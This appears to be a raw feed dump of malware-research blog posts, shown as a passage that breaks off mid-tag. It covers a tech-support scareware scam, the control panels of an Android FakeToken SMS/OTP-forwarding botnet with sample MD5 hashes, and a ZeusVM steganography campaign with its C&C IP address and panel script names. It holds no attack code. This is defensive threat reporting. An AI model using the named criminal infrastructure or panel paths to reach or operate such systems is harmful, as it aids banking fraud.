src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvZ7OxYk4kYFark2nL7ap8-vWyD5M-h4ZakoHjdBCfIQpNkf2ZUZ-7JPppccUPdMI1EfaZDu0HiyMPC9ibe-wNy1drqQ1dmDCXot9cO1vZtUpZSDzaqb8rLgTXOinbT3v0V8XeBoTOEbw/s1600/27-04-2014+20-19-06.png" height="88" width="400" /></a></div> "Your computer's file system has encountered a serious&nbsp;error. Please restart the computer or call support at 1-866-286-6162"<br /> <br /> After a reboot, a shutdown procedure is initialized:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_pPWXkC8XYooxKjvzvaH_7MV3HLOVrQJvUTAdyF7Kac2pDWQbchyz7zBkQ8aCPu-MfPhUH93_dxedAn7Clgni2e65VUy3o2JVcHdYbk6yXz73uqqNhFLegCYUQwdV81EiPTl8JfU8fA/s1600/27-04-2014+20-32-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_pPWXkC8XYooxKjvzvaH_7MV3HLOVrQJvUTAdyF7Kac2pDWQbchyz7zBkQ8aCPu-MfPhUH93_dxedAn7Clgni2e65VUy3o2JVcHdYbk6yXz73uqqNhFLegCYUQwdV81EiPTl8JfU8fA/s1600/27-04-2014+20-32-20.png" height="107" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGFjphwJHnXtqeEPjcIlJfYtIGq8qBcjcE82IZ7E4JZTtYWfGd9jXsfDCNp-Pji_gIvTCJI3ihEGJjUmgV6GMl8z-P1f8t63EFDIiYoIu-QyP8JlpgfEmQZCZJWhqVCbm46EXBUfC8by8/s1600/27-04-2014+20-33-33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGFjphwJHnXtqeEPjcIlJfYtIGq8qBcjcE82IZ7E4JZTtYWfGd9jXsfDCNp-Pji_gIvTCJI3ihEGJjUmgV6GMl8z-P1f8t63EFDIiYoIu-QyP8JlpgfEmQZCZJWhqVCbm46EXBUfC8by8/s1600/27-04-2014+20-33-33.png" /></a></div> <br /> And 5 minutes after, once again the messagebox:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJIZY7kALRkN9awpuUw-nki-9XRZTrNfeE8mD09iCW1YpgPFiEZ8QBkkH_wcyLPkcLO_BIhgLhEs_IWmBfEqZtxBxsYH6XS3f9jXC5nXE9sk7VII_HX9zeE4JGPC8voFmdW4gPimaQr8A/s1600/27-04-2014+20-38-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJIZY7kALRkN9awpuUw-nki-9XRZTrNfeE8mD09iCW1YpgPFiEZ8QBkkH_wcyLPkcLO_BIhgLhEs_IWmBfEqZtxBxsYH6XS3f9jXC5nXE9sk7VII_HX9zeE4JGPC8voFmdW4gPimaQr8A/s1600/27-04-2014+20-38-31.png" height="220" width="400" /></a></div> <br /> <br /> I searched the phone number on google and found this:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguuSuPqK5JDW6kUBfqkQIhHYj8j4ftwprRYtJFqVLDEz0PPeN6XKE2Xihi7FphWMG0Mdn_xctGyI5BgGezjHfvowWKgvGyGOAR3XSwIFabLEHZqkmvrSW42rfRJqH_UKXQewOvOgRayB4/s1600/27-04-2014+20-42-08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguuSuPqK5JDW6kUBfqkQIhHYj8j4ftwprRYtJFqVLDEz0PPeN6XKE2Xihi7FphWMG0Mdn_xctGyI5BgGezjHfvowWKgvGyGOAR3XSwIFabLEHZqkmvrSW42rfRJqH_UKXQewOvOgRayB4/s1600/27-04-2014+20-42-08.png" height="313" width="400" /></a></div> "Technicion is an independent provider of on-demand tech support and not affiliated with any third party"<br /> <br /> ok, what's about the payement page:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXxMa59UKDJS2h-6fWwCM9UW4CgQdh8I8uvdqgbbE0vM0UHR3twKHaLdCsTyCZu_SbkfwXIdFWq_xgaTD5mj4XC70IS0V6WTlgr7TFzDnX6XM_3P2QLran8lCCjo0MpLzpJ9btMuo5f40/s1600/27-04-2014+20-46-09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXxMa59UKDJS2h-6fWwCM9UW4CgQdh8I8uvdqgbbE0vM0UHR3twKHaLdCsTyCZu_SbkfwXIdFWq_xgaTD5mj4XC70IS0V6WTlgr7TFzDnX6XM_3P2QLran8lCCjo0MpLzpJ9btMuo5f40/s1600/27-04-2014+20-46-09.png" /></a></div> Just 99.99 without any explanation, even the currency symbol is unknown, what a serious site.<br /> <br /> And for the story i tried to call 1-866-286-6162 to insult them and tell them how much i hate their ugly code etc.. but there was no available representatives..https://www.xylibox.com/2014/04/lame-scareware.htmlnoreply@blogger.com (Steven K)6tag:blogger.com,1999:blog-5365964245877416061.post-1605772860571362722Sun, 20 Apr 2014 11:07:00 +00002014-04-20T13:07:41.087+02:00Android/FakeToken.ABotnetbotnet phoneOTP forwarderPhoneSMSOTP forwarder dumped months ago.<br /> <br /> Login:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9bf6LrIl99slYpJGtwaHTxAbshCD16vntPzsszqJqklEIs0q9d8wYIOsYp6n1uZ7nu063PM-sCkXDhZKqhK_IxItV0lbVrwrLB7s0GgWm2jiRpphzM9UmRz7KlXF8ZZ7nxhZQe28ECW0/s1600/28-11-2013+21-15-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9bf6LrIl99slYpJGtwaHTxAbshCD16vntPzsszqJqklEIs0q9d8wYIOsYp6n1uZ7nu063PM-sCkXDhZKqhK_IxItV0lbVrwrLB7s0GgWm2jiRpphzM9UmRz7KlXF8ZZ7nxhZQe28ECW0/s1600/28-11-2013+21-15-57.png" /></a></div> <br /> Statistics:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiCG5ndLNT3yXjXgBXcHgsNmJFaqCmMe-y6q-xWW-hNkGyZytK86NvuqqgAQnJE65Yn8jXTWwpCC0jRUEMP5UJ87WR1EQ72nPC5YGBrc7Ne_IPV8gzYzl7X3SYIzrRwgpw74FK6dCT-sQ/s1600/28-11-2013+21-17-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiCG5ndLNT3yXjXgBXcHgsNmJFaqCmMe-y6q-xWW-hNkGyZytK86NvuqqgAQnJE65Yn8jXTWwpCC0jRUEMP5UJ87WR1EQ72nPC5YGBrc7Ne_IPV8gzYzl7X3SYIzrRwgpw74FK6dCT-sQ/s400/28-11-2013+21-17-31.png" height="226" width="400" /></a></div> <br /> Bots:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivFqvKbtBXkJuw12emDH7weFZcR8fESuYkn70u7wxBE8-krBpkMd-f7gkpitqaHKDQQeCzjGpDW9CfAey_MRBuMhJ5TaCdn9zinGuqLIvluWxeLmITEyAZFtQpGjq9hD4p-P0z9ckvkxo/s1600/28-11-2013+22-42-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivFqvKbtBXkJuw12emDH7weFZcR8fESuYkn70u7wxBE8-krBpkMd-f7gkpitqaHKDQQeCzjGpDW9CfAey_MRBuMhJ5TaCdn9zinGuqLIvluWxeLmITEyAZFtQpGjq9hD4p-P0z9ckvkxo/s400/28-11-2013+22-42-48.png" height="250" width="400" /></a></div> <br /> Bot:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7BxfVwKGsH0OMCrQl2FHXudi0HEplMzy5GrtB2f0zjSygUBqj2Doz4RZh2N7wUbp6zxc3HrAWnHvSvCW0-8psuhLiSVx3xk6VI-9771M8I-ORLkCYLWHXq_HmSmBLjJcpXxw15n234Vk/s1600/28-11-2013+23-49-37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7BxfVwKGsH0OMCrQl2FHXudi0HEplMzy5GrtB2f0zjSygUBqj2Doz4RZh2N7wUbp6zxc3HrAWnHvSvCW0-8psuhLiSVx3xk6VI-9771M8I-ORLkCYLWHXq_HmSmBLjJcpXxw15n234Vk/s400/28-11-2013+23-49-37.png" height="372" width="400" /></a></div> <br /> Passwords:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2-TkR_bNrkR1CCU9PcCvkZ5yYI6zGE40gUwxekdTpZcnP_fO2neI7W9KjIFEZjI-I1fTMSkNwDFRKM9lHfFqNT1UUhptdjCDRYy5YP221CHEOK_CE8xe7GsOZXcZAqNg-x-i7C0unu0s/s1600/28-11-2013+23-50-28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2-TkR_bNrkR1CCU9PcCvkZ5yYI6zGE40gUwxekdTpZcnP_fO2neI7W9KjIFEZjI-I1fTMSkNwDFRKM9lHfFqNT1UUhptdjCDRYy5YP221CHEOK_CE8xe7GsOZXcZAqNg-x-i7C0unu0s/s400/28-11-2013+23-50-28.png" height="235" width="400" /></a></div> <br /> Send a command:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhje_CMYqgPPVvcdyjhyKxsF_mYoTwQiOXQffFNY0NU7pBQE63A7ZS6aExapCHTSS4FC-Yldmb92l2V0QYhQGAOjgFDtxJmwyTwIWnPpYCPEkgoySCmgYvIYmy7YIa-Yemyopv5YahhIE8/s1600/28-11-2013+23-50-45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhje_CMYqgPPVvcdyjhyKxsF_mYoTwQiOXQffFNY0NU7pBQE63A7ZS6aExapCHTSS4FC-Yldmb92l2V0QYhQGAOjgFDtxJmwyTwIWnPpYCPEkgoySCmgYvIYmy7YIa-Yemyopv5YahhIE8/s400/28-11-2013+23-50-45.png" height="223" width="400" /></a></div> <br /> Commands sent:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOTVrQNhrBNdTNd3JFD1ij4FmZW-drms_8OqKMvgQ5b5nJPrcO15814XhyphenhyphenyD-S1ewtTOSEYQ92k4vlR6wNx00Bnz7o_v2hLWuo3riv7ss1xAkbfLjTdhnKgwPusQ_vuxLpO2iBd2e3tEY/s1600/28-11-2013+23-47-33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOTVrQNhrBNdTNd3JFD1ij4FmZW-drms_8OqKMvgQ5b5nJPrcO15814XhyphenhyphenyD-S1ewtTOSEYQ92k4vlR6wNx00Bnz7o_v2hLWuo3riv7ss1xAkbfLjTdhnKgwPusQ_vuxLpO2iBd2e3tEY/s400/28-11-2013+23-47-33.png" height="226" width="400" /></a></div> <br /> Apps:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYy18mwUick97vBupUwbzDjM2splMJctJqPFiX75isNO0Jt3yr4UCis0p3ic37jecr-P2g0p6Yu_a3NUjPyakIntitXZMRvmuMX1cigcyJQRnkkjpkXqjL7qQSRFF7wOZkX_Xjt5PtDt8/s1600/28-11-2013+23-47-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYy18mwUick97vBupUwbzDjM2splMJctJqPFiX75isNO0Jt3yr4UCis0p3ic37jecr-P2g0p6Yu_a3NUjPyakIntitXZMRvmuMX1cigcyJQRnkkjpkXqjL7qQSRFF7wOZkX_Xjt5PtDt8/s400/28-11-2013+23-47-48.png" height="250" width="400" /></a></div> <br /> Apps builder:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0NeHjulfahNlgtSRa99xajePgWuKejMD05RRvEGQhR71H1EG1HgbyYHc78W_nUDT0eqHQxaHGmwN9gHnxCe2OTDCEVfbEHGsYfELoGh3XHxncfJ73F2D8xnFhjN1VNxrN-irUjEDHoeI/s1600/28-11-2013+23-48-10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0NeHjulfahNlgtSRa99xajePgWuKejMD05RRvEGQhR71H1EG1HgbyYHc78W_nUDT0eqHQxaHGmwN9gHnxCe2OTDCEVfbEHGsYfELoGh3XHxncfJ73F2D8xnFhjN1VNxrN-irUjEDHoeI/s400/28-11-2013+23-48-10.png" height="335" width="400" /></a></div> <br /> MD5s:<br /> 2d4770137ae0b91446fc2f99d9fdb2b0<br /> f629adcfbcdd4622ad75337ec0b1a0ff<br /> dd4ac55df6500352dd2cad340a36a40f<br /> b9f9614775a54aa42f94eedbc4796446<br /> 1fababfd02ea09ae924cd0a7dbfb708c<br /> bc8394bc9c6adbcfca3d450ee4ede44a<br /> 1cb87e1716c503bf499e529ee90e5b31<br /> 6db5cdd2648fcd445481cdfa2f2b065a<br /> 2ad6f8b8e4aaf88b024e1ddb99833b79<br /> 8bac185b6aff0bec4686b7f4cb1659c8<br /> <br /> App settings:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxxSQLrwee4v3lgZzXjuSFHLHA3eY-tSWfaCl-6az7zYHPIIypDYfxV6aDut1wcaLhBwF8KUhn3unO55r1gtDIkO6jB8mikbMT8npSSuk0ZnhdsteyiXB7nij6eqvyPBbJOl2H4iH_6m8/s1600/28-11-2013+23-48-27.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxxSQLrwee4v3lgZzXjuSFHLHA3eY-tSWfaCl-6az7zYHPIIypDYfxV6aDut1wcaLhBwF8KUhn3unO55r1gtDIkO6jB8mikbMT8npSSuk0ZnhdsteyiXB7nij6eqvyPBbJOl2H4iH_6m8/s400/28-11-2013+23-48-27.png" height="230" width="400" /></a></div> <br /> Settings:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEUPcCp6mslti4nOG62l4l-QXakL50Jedbo1W4XiZGCbmQgVCfEASiiQ5Y2Ly9PQJk2tyeyH0cYGmbgCNwrrqaL1OS0ai3-aL2VuPxNNn3Xzxk4HG5UpEXZHIKCpWPAl7RoQMN7HKFAic/s1600/28-11-2013+23-48-55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEUPcCp6mslti4nOG62l4l-QXakL50Jedbo1W4XiZGCbmQgVCfEASiiQ5Y2Ly9PQJk2tyeyH0cYGmbgCNwrrqaL1OS0ai3-aL2VuPxNNn3Xzxk4HG5UpEXZHIKCpWPAl7RoQMN7HKFAic/s400/28-11-2013+23-48-55.png" height="230" width="400" /></a></div> <br /> Second panel, a bit different, look like a 'test' one.<br /> Statistics:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQfwMPHoZvhZimr5jWePoM5TVkVGfQfYRs9OIW3qAjMPjb-joZn__CSjxiWwDtWETkVXdZCuCJK2pkuIoTgB-EULHx2jnZwXUx4u4LerhAfF1-_8uke4WW0GOJ1nzogkoNoUq2k_C2cEA/s1600/01-12-2013+16-10-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQfwMPHoZvhZimr5jWePoM5TVkVGfQfYRs9OIW3qAjMPjb-joZn__CSjxiWwDtWETkVXdZCuCJK2pkuIoTgB-EULHx2jnZwXUx4u4LerhAfF1-_8uke4WW0GOJ1nzogkoNoUq2k_C2cEA/s400/01-12-2013+16-10-54.png" height="162" width="400" /></a></div> <br /> Phone:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht6QxR_kUi4F451IFeIeBGgd0iXoqTbcTol5luVgFMMU25IAkTYyLDY9Ep66LpDMCtWK18jHS7jujjeQyf-8s5JXA1sMVSNtYDn_VkgLxWVL5naN3uprtQ28pA6S4JqJ-l6Yhf8MISR4o/s1600/01-12-2013+16-14-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht6QxR_kUi4F451IFeIeBGgd0iXoqTbcTol5luVgFMMU25IAkTYyLDY9Ep66LpDMCtWK18jHS7jujjeQyf-8s5JXA1sMVSNtYDn_VkgLxWVL5naN3uprtQ28pA6S4JqJ-l6Yhf8MISR4o/s400/01-12-2013+16-14-17.png" height="162" width="400" /></a></div> <br /> Phone search:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX9buLw1gap0b4RzvxcrUH3tQbdJGLk7GtA5noUf6q-td3ucFQaWWq7Jcer87CWmkLSZ581bYRqjDZuIsvZ-eUhuSzE1vnyN0FeN4nHQxiw_SvQcLE7cqQRqC5dK0FsbFB5aeXNAihYyo/s1600/01-12-2013+16-15-04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX9buLw1gap0b4RzvxcrUH3tQbdJGLk7GtA5noUf6q-td3ucFQaWWq7Jcer87CWmkLSZ581bYRqjDZuIsvZ-eUhuSzE1vnyN0FeN4nHQxiw_SvQcLE7cqQRqC5dK0FsbFB5aeXNAihYyo/s400/01-12-2013+16-15-04.png" height="180" width="400" /></a></div> <br /> Settings:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF5xqI3htNP-_3esuK1OMM9e026iq-Iskg3RdfVmKwJ1yWvt3Hgs74br-5uV3dmeKlSzd-J1tmaSHc-ZEaKVhdad82MrPLp1N3AYGQqIO_9CmOWWYVIaPVpFIrjUeY1abuUIVV9RUce7k/s1600/01-12-2013+16-17-38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF5xqI3htNP-_3esuK1OMM9e026iq-Iskg3RdfVmKwJ1yWvt3Hgs74br-5uV3dmeKlSzd-J1tmaSHc-ZEaKVhdad82MrPLp1N3AYGQqIO_9CmOWWYVIaPVpFIrjUeY1abuUIVV9RUce7k/s400/01-12-2013+16-17-38.png" height="162" width="400" /></a></div> <br /> RSA Security talked also about it <a href="https://blogs.rsa.com/behind-scenes-fake-token-mobile-app-operation/">here</a>https://www.xylibox.com/2014/04/androidfaketokena.htmlnoreply@blogger.com (Steven K)3tag:blogger.com,1999:blog-5365964245877416061.post-7386495101173450124Sun, 13 Apr 2014 19:20:00 +00002014-04-13T22:35:22.753+02:001.0.0.21.0.0.5Nuclear Exploit PackSteganographySUTRAZeusVMMonths ago, researchers observed an evolution of ZeusVM, time to get back on this family.<br /> <br /> For informations,<br /> The first ZeusVM sample i've seen using steganography was the 21 November 2013.<br /> The IP of the C&amp;C have Russian origin: <a href="https://www.virustotal.com/en/ip-address/212.44.64.202/information/">212.44.64.202</a> <br /> A Sutra TDS who redirect on Nuclear Exploit pack was pushing the payload, Roman of abuse.ch blacklisted 212.44.64.202 one month later on his <a href="https://zeustracker.abuse.ch/monitor.php?host=212.44.64.202">Zeus tracker</a>. <br /> <br /> The first guy who publicly wrote about ZeusVM change is probably Jerome Segura of <a href="http://blog.malwarebytes.org/security-threat/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/">Malwarebytes</a>.<br /> Actually the latest version i've saw in the wild is 1.0.0.5, and if you want a hash: e4c31d18b92ad6e19cb67be2e38c3bd1 (sample is fresh of today)<br /> <br /> Let's have a look on the first server that i've see now... 212.44.64.202.<br /> Pony, Multilocker, Mailers, Grum and an older version of ZeusVM (without steganography) was also hosted on this server but that not the topic.<br /> <br /> The filename of login scripts and ZeusVM configs were hardnamed in russian, like:<br /> borodinskoesrajenie.jpg (http://en.wikipedia.org/wiki/Battle_of_Borodino)<br /> vhodtolkodlyaelfov.php (only elves can enter)<br /> logovoelfov.php (elf's den)<br /> domawniypitomec.php (domestic animal)<br /> jivotnoe.php (animal)<br /> larecotkryt.php (the chest is open)<br /> And so on.. overall the panel design seem back to the original zeus style (not like the previous 'generation' of ZeusVM with casper)<br /> <br /> /kec/:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjskgkmq1Ur6-adBTRJZ_MtOPQ2atkCH_xXUJhI5y27lWi9I9_sNBfZ-6vZjHTaK1vuXfIh1IA-Ip-l8irPmteIEnRciBP_HlfSpKk1O8rePVx3o9ZW3lXKLKq3eBcKh9-geCsjsGlb7kA/s1600/16-02-2014+16-30-34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjskgkmq1Ur6-adBTRJZ_MtOPQ2atkCH_xXUJhI5y27lWi9I9_sNBfZ-6vZjHTaK1vuXfIh1IA-Ip-l8irPmteIEnRciBP_HlfSpKk1O8rePVx3o9ZW3lXKLKq3eBcKh9-geCsjsGlb7kA/s1600/16-02-2014+16-30-34.png" height="400" width="290" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLjLZh5NilmyCk_2aXzOMVf1yz94XDVUcshJQVyjf52qLLbxkJJhd0RhViqdTpUPsWK0sQSdFRac8RQ19CXSRFgqkA-QowLqizF4o_YEgA45OHOdoL8wp-Pz5UGsHasqm1V14E4bLUsEE/s1600/16-02-2014+16-37-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLjLZh5NilmyCk_2aXzOMVf1yz94XDVUcshJQVyjf52qLLbxkJJhd0RhViqdTpUPsWK0sQSdFRac8RQ19CXSRFgqkA-QowLqizF4o_YEgA45OHOdoL8wp-Pz5UGsHasqm1V14E4bLUsEE/s1600/16-02-2014+16-37-13.png" /></a></div> <br /> /luck/:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJUlQ8Tw3EzKbrWwaykIp8Qxu4GCFlOherBqZ68wIteXMJAPb08hMqVI7eJrXH2kDYPpgRCsazR4PjSxJ1Q2C2C_VXxz98fVPXuKYuidisPK3T55YCYGEREOxQuvWvnn25_ixBtG7Zi3M/s1600/16-02-2014+16-39-29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJUlQ8Tw3EzKbrWwaykIp8Qxu4GCFlOherBqZ68wIteXMJAPb08hMqVI7eJrXH2kDYPpgRCsazR4PjSxJ1Q2C2C_VXxz98fVPXuKYuidisPK3T55YCYGEREOxQuvWvnn25_ixBtG7Zi3M/s1600/16-02-2014+16-39-29.png" height="400" width="380" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFHtA_CUYTTHOCuxf5JZ7rvhcJGWP8-igdbQ90C9eoQIgFs52E55R5-OCSh_m5AhkWIC66_Plcse0NRaQigHH5XtlbpwkjIpgmz8a35vCFJQIW0VJWERffGsi21ehhQgY2XXsslmW1DeQ/s1600/16-02-2014+16-40-26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFHtA_CUYTTHOCuxf5JZ7rvhcJGWP8-igdbQ90C9eoQIgFs52E55R5-OCSh_m5AhkWIC66_Plcse0NRaQigHH5XtlbpwkjIpgmz8a35vCFJQIW0VJWERffGsi21ehhQgY2XXsslmW1DeQ/s1600/16-02-2014+16-40-26.png" /></a></div> <br /> /ass/:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT70YPY2XQff06TpuNXPOsrexXf58LWYVzlLkrZ1-TDlg2JlOi3zIIV0FhCDCwoQvqzKg7JgkJvo5W2LttlUb7zsYiGgSVmqPuAKZrYrCa5iX3K4ELsR0iSYaxCYQ-ofO6G7xy6C8VfqU/s1600/16-02-2014+16-42-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT70YPY2XQff06TpuNXPOsrexXf58LWYVzlLkrZ1-TDlg2JlOi3zIIV0FhCDCwoQvqzKg7JgkJvo5W2LttlUb7zsYiGgSVmqPuAKZrYrCa5iX3K4ELsR0iSYaxCYQ-ofO6G7xy6C8VfqU/s1600/16-02-2014+16-42-43.png" height="321" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjmggwqnzu7loOvquEd9yeIr_FNfxxR7Po3R4uiKhYENv7d46NDBbk1Dp6f7dVoCT1Y90XCLaN8e6NrxeRVLNvYeMdo37MP7QX8cVQ-x9zncpyFdZpxFBFEH6kbzbzSNAo0yLsj_FX1rY/s1600/16-02-2014+16-43-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjmggwqnzu7loOvquEd9yeIr_FNfxxR7Po3R4uiKhYENv7d46NDBbk1Dp6f7dVoCT1Y90XCLaN8e6NrxeRVLNvYeMdo37MP7QX8cVQ-x9zncpyFdZpxFBFEH6kbzbzSNAo0yLsj_FX1rY/s1600/16-02-2014+16-43-23.png" /></a></div> <br /> /kbot/:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixyV5VGIy2KVLkmkVdJ0HS_akWS6HjK_xrgLWPtk_F3mBdgfpbtGZxEwKJIW9EIXcLfwllQ2gCPySoPTE5iT-lWc3BypXMXEcxusEyAiePyHxE1uuT3_Lkf0VCkBHsufLO3jD3O6Lxp5I/s1600/16-02-2014+16-46-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixyV5VGIy2KVLkmkVdJ0HS_akWS6HjK_xrgLWPtk_F3mBdgfpbtGZxEwKJIW9EIXcLfwllQ2gCPySoPTE5iT-lWc3BypXMXEcxusEyAiePyHxE1uuT3_Lkf0VCkBHsufLO3jD3O6Lxp5I/s1600/16-02-2014+16-46-00.png" height="321" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVF3b9m8VJ3EnERaqpkUlkawqFV1-LSqZSIkYws0rGMAyMFHPKwONDFNXjBeat-gT988SvncWGiwhbR7zGX3oN6rPq88Km9dV9GTDT75sUVnf-YZQp5X-764KVoZY0qDzFQCCa-xKJRL8/s1600/16-02-2014+16-47-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVF3b9m8VJ3EnERaqpkUlkawqFV1-LSqZSIkYws0rGMAyMFHPKwONDFNXjBeat-gT988SvncWGiwhbR7zGX3oN6rPq88Km9dV9GTDT75sUVnf-YZQp5X-764KVoZY0qDzFQCCa-xKJRL8/s1600/16-02-2014+16-47-31.png" /></a></div> <div class="separator" style="clear: both; text-align: center;"> </div> <br /> /ksks/:<br /> <div class="separator" style="clear: both; text-align: center;"> <a 